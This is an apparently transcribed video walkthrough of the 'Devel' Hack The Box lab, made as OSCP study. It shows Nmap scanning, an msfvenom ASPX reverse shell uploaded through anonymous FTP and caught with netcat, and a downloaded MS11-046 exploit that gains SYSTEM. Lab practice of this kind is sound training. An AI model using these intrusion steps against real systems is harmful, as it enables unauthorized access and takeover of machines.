All right. If you are here, then you probably got a link to the video. I am doing a project. I am going to try to get my OSCP done in the next 3 months or so, and I have been out of the game for a really long time in terms of penetration testing. So what I want to do is I want to go over TJ Null's list of vulnerable boxes, well, list of hack-to-box boxes, maybe some Bonhob boxes, to prepare myself for the OSCP. Let me just go ahead and bring that up right this very moment in my virtual environment. Here we go. And this is the list right here. Just Google TJ Null's list or TJ Null's OSCP list, and you should have a fine list of about 80 something odd machines in here. Let's take a look. How many machines are there to root in here? And it looks like there are 98 machines to root of varying levels of difficulty across Hack the Box and all that good stuff. So, without any further ado, and without that pomp and pageantry, let's go ahead and just jump into a box. I have gone ahead and just selected Devel right here as going to be our first box to get done. So let's get prepared for the actual thing itself here. Now, let me minimize this. Let me go ahead, make myself a little smaller over here. All right, so I'm not in the way. Fantastic. Okay, so let's go ahead and go and prepare. Control-Alt-T. Escalate my permissions like a bad boy. Okay. CD HTB. Okay. Already made a directory called Devel. CD Devel. And what we're going to do first and foremost is going to go ahead and make sure that our VPN is up and running. That is with the Yaquake for the drop down. Yaquake. Yeah. Just install it from the GitHub, the repository there. And it looks like I am set. I am up and running. And let's see if this bad boy is already running on this side. And what do you know? Let's go ahead and do that. 10.10.10.5 is the IP address of the machine that we are going to investigate. And this looks like it's going to be an easy Windows machine. I've probably done this like years ago. But let's go ahead, put something on paper. Maybe you guys can learn something. And I can remember how to do all this stuff. Okay, like I said, I've been out of this for a while. Let's see if I remember any of this here. Okay. All right, first thing to do, let's go ahead and evaluate the attack surface of the target using an Nmap scan. Nmap SC, SV, 10, 5. Let's go ahead and get that bad boy in there. I should really make an association with a name on the host file. But yeah, I can remember this IP address quite easily. All right, let's not forget ON. Let's just call it Nmap. Let's just go ahead and call it nmap or devel.nmap.out, and we can go ahead and go through there. Now, I already did that because we actually have already ran that because it takes a while. So let's go ahead and cat the output devel.nmap.out, and here we go. Looks like we have ourselves port 21 that's open. Looks like, curiously, there is anonymous FTP that's allowed in this bad boy. Let's see here, port 80 is open, and we're using IIS HTTPD 7.5. 7.5 is an older version of IIS. Let's go take a look at what we got here. Actually, before we do that, let's go ahead and pay the website a visit. 10.10.10.5 is the website, and willkommen, benvenido, tervetuloa. Which one? I have no clue what any of these other languages are, but let's go ahead and... Okay, this is an older version of IIS. That's cool. Let's see, and this is interesting. We have a welcome.png right here. Let's go properties, and it's called welcome.png. All right. Okay, I'm remembering this box now. It seems as if the anonymous FTP is being served, is associated, or the same place the web contents are associated at. But in this, let's go ahead and finish this up, wrap this up. Why does it matter? IIS 7.5 Windows version. Let's see what version it's shipped out with. For Internet Information Services. Let's see here. Just a point of reference here, guys. That's what we're looking for. Make sure that our information is set. I know it's in here somewhere. Okay. Is this the one here? Is this what I'm looking for? All right. 1.0 NTP. Okay, what are we looking at here? IIS, there is no IIS 9, but when we look at 7.5, built-in component of Windows 7 and Windows Server 2008 R2, that looks about right. Okay, so we go over here. We look at a little bit more about the machine. We verified that there is a welcome page over here. All right, so let's go ahead and just take a look at what's going on here. Do FTP 10.10.10. 5. It's anonymous, so it's anonymous. It doesn't matter what the password is. If I do a dir and as confirmed, there is ASP.NET, Devel.aspx, IAS start, and then welcome.png. Looks like this is the default directory, and I'm assuming that, okay, it just gave it away. The Devel.aspx right here looks like it is, well, I know it, but I know what it is. It's a web shell that somebody uploaded. That's just the bad thing about not having your dedicated boxes. On Hack2Box. In all reality, we can go ahead here, since somebody ruined it for us, we can go ahead and say Devel.aspx, and it should give us a, come on. Somebody's reverse shell, or actually, I wonder if this is a reverse shell. Let's go get Devel.aspx. Okay, let's exit that, and let's go ahead and see what this guy was doing. Okay, this is outside of what we're Devel.aspx and more. All right, so let's see here. We got a little bit of shell code. Ran the script. Looks like this was a reverse shell that somebody popped in there. Okay, all right, so let's go ahead and do that ourselves. Let's go ahead and create a reverse shell for us from here. Okay, so the idea here is, let's go use MSF Venom, and I am going to, for the payload, set for Windows, reverse TCP shell, and I don't remember what the payload is, so I'm just gonna have to go do a little bit of Googling. MSF Venom, ASPX reverse shell, and there's got to be a cheat sheet in here somewhere. And what do you know? We found ourselves a cheat sheet, and there is definitely a reverse shell for ASPX. I just know it in my bones. I feel it. It's in here. I know. Well, actually, I don't even know why I'm being coy. Yes, there is one because I've used it before in the past. All right. The only thing is, I don't want to use Metasploit, so I'm not going to use an interpreter payload. I'm going to use a standalone right here. Okay. So, okay. All right. So there's AXPS right here. Oh man, I don't want a interpreter payload. Let's go ahead and try to find another one. Okay. ASPX, reverse shell, sure, reverse hell, whatever it is. NetSec focus. Okay, so let's go ahead and go to NetSec and see what they say. Again, we're going to look for ASPX. I don't want this. So you guys are probably laughing because I joke all the time. 90% of pen testing is basically 99% of pen testing basically is Googling. Where is the context? Where exactly is the context for what I'm looking at here? That is ASPX, Windows shell. There you go. I think I found it. There you go, right there. All right, so let's go do ASPX. All right, so I am going to try to remember this one right here. Since we are using ASPX, let's go ahead and do that. Okay, Windows shell reverse TCP. God, like let's dyslexic. Shell reverse TCP. Let's go ahead and say lhost equals. Let's go figure out our lhost. if config 10.10.14.17. Okay, 10.10.14.17 is going to be my host here. L port, that's going to be what the port I'm going to be listening on, is going to be 19, I don't know, let's say 1980 equals 1980. And let's go ahead and do this. You know what? I'm feeling a little froggy right now. So let's go ahead and go to F ASPX, and I am going to call it, go into this thing. I'm just going to skip the x86 Shigata Gadai thing, and I'm going to call it reverse.aspx. Sure, reverse.aspx. Let's see if this works, and then we'll upload it to the web server and see what happens from there. Yeah. Okay. Let me go ahead and just stage a reverse shell lookup right now, or reverse shell catcher. Sudo su netcat nlbp 1980 is what I'm looking for, and what I'm going to do is I'm going to go ahead and send FTP, I should say, FTP on over to 10.0.0.5, and I'm going to send reverse.aspx, and let's go ahead and see if we can actually trigger this reverse shell on my end over here, and we called it reverse.aspx. No, nothing is happening at the moment. Reverse ASPX, nothing is happening. All right, well, something obviously went wrong. I mean, we uploaded it, so let's go ahead and exit out of here again. And let's go ahead. 10.10.14.17, 10.10.14.17. I'm listening to 1980. It's going to reverse ASPX right there. All right, well, fine. Let's go ahead and use a Shigata known guy. Let's get rid of that. Control-Shift V. Oops. All right, going to override it. Let's see what happens. Are you serious? Could have been a thing the entire time. That couldn't have been it. Invalid panel. Did I have a wrong thing in there the entire time? Dubious, I say. All right, let's go FTP back on over. And let's go ahead and do a reverse again. Let's press the magic button. Press F5. Well, they freaking died. Did not work again. Like, you just got a bunch of garbage characters in here. All right, so let's go ahead and take a look over here. All right, so let's go ahead. You know what? Let's go mess with that. Let's go mess with that payload a little bit more. Windows reverse shell, Shikata Narai. Okay. I don't get it. The exact same thing. I did the exact same thing every time. Now I got nothing here. Okay, so here we go. Let's go ahead and bring that up. Okay, I'm in here. Let's go find system info. Let's see what brings up. Looks like this is a 2007 machine. Well, actually, I shouldn't say that. 2000 Windows, Microsoft Windows 2007 Enterprise. We take a look over here. Over in hotfixes, none have been applied ever. Okay, well that pretty much gives us an easy win right there. An easy win. We see that it's x86 based, 64X family. Okay, it doesn't really matter. We always, I mean, in this case, I'm going to look for anything that's a 32-bit payload. Not a big deal. This thing should be falling off any moment now, but let's just go ahead and do our due diligence and say, hey, we are looking for exploits. Actually, you know what? I am going to hack tricks. Yeah. I'm gonna remember it. Okay, so let's go ahead and look for Windows 7 Enterprise 6.1 7600 MS Bulletin exploits or something like that. MX Bulletin exploits. Looks like there is something over here. AFDS system here. Exploit Windows x86 all versions. AFD privilege escalation. Kidoki. And what is this what's the street name of this exploit here? MS11046. Okay. Do I really feel like compiling this on my own? No, I don't really feel like it. So, okay, so let's go ahead and take a look over here. Basically MS, for you guys that don't know, it's a Microsoft Security Bulletin. They stopped using it a couple years ago, so it's nothing, I mean, not really anything there. Okay, so we could compile this in Linux. We can compile this ourselves in Linux, but let me show you guys a quick cheat. It's called SecWiki. SecWiki MS11046 is what we're looking for, and then boom diggity diggity, we have ourselves a MS11046 right here, pre-compiled for us, and it is in Japanese. MS11046. Okay. Nope, I don't want that. I want a compiled version of it. Okay, where are you? SecWiki. There you go. MS11046 right there, and we can just go ahead. We can just grab this right now, and let's see here. Grab that. Cancel that and copy link location. That's what I want. Copy link location. Control Shift T. Oh, bumbled it. Okay, let's go ahead and go to HTTP Devel. Okay, wget. This bad boy over here. Great, we got it. And let's go ahead, since we have the FTP still up and running. Oh no, close the connection. FTP 10005. Again, let's connect. All right, send. Actually, I need to set to binary. Binary, set type to 1. The reason for that is because we've been passing around ASCII file formats earlier. So we want to set the binary. Set to binary because we're sending a binary file. That's what an executable is. Send ms11 k8.exe. And there we go. Let's go ahead and exit out of there. And if I do just file nc.file ms whatever, it tells me it's a PE executable, x86 for Windows. I wouldn't really be downloading executable files on my system, but this is a Windows executable, and I am in a Linux environment, so I'm not really too worried about it. All right, so we got to execute this file somewhere here. We're already in the system, so that's kind of cool. So if I go into the C drive, there, I am going to go to where inetpub right here. Inetpub basically is where the web directory is, and we are going to look for www root because that's where the root files are being served at. And if we go in here, Django, we got ourselves ms1108exe. Let's go ahead and paste that bad boy in there. And who am I? Huh. Not good. Did not work. MS11 did not work here. MS. All right, let's try another one. Let's go ahead and grab another one. Copy that link location. Go into my ZSH, wget. Okay, looks like we are set. And we have now two files here. Let's go back FTP, ken, whatever. Ooh. Set binary again. Binary. Send. Okay. And dir that. And there should be an MS11 right here. Paste that bad boy in. We got it. Who am I? I am authority, network authority. If I go into here, cd C users administrator. No, it's not administrator. Okay, so let's go ahead, jump in there. Oh, you don't like it. Okay. All right. Well, that was actually fairly slow. Okay, we'll do a breakdown for it in a second here, guys. Well, you guys can see that I am NT Authority. I pretty much own the box right now. Let's go ahead and do an explanation for that. Okay, so if it was actually I don't have time for it. We'll do part two. We'll do part two and look at other ways how to hack this box. Okay, that was one very simple way how to hack that box. Let's go ahead and convene for video 2, where we tried different techniques. Okay, so that was one way to skin a cat. I'll show you guys another way how to skin a cat soon.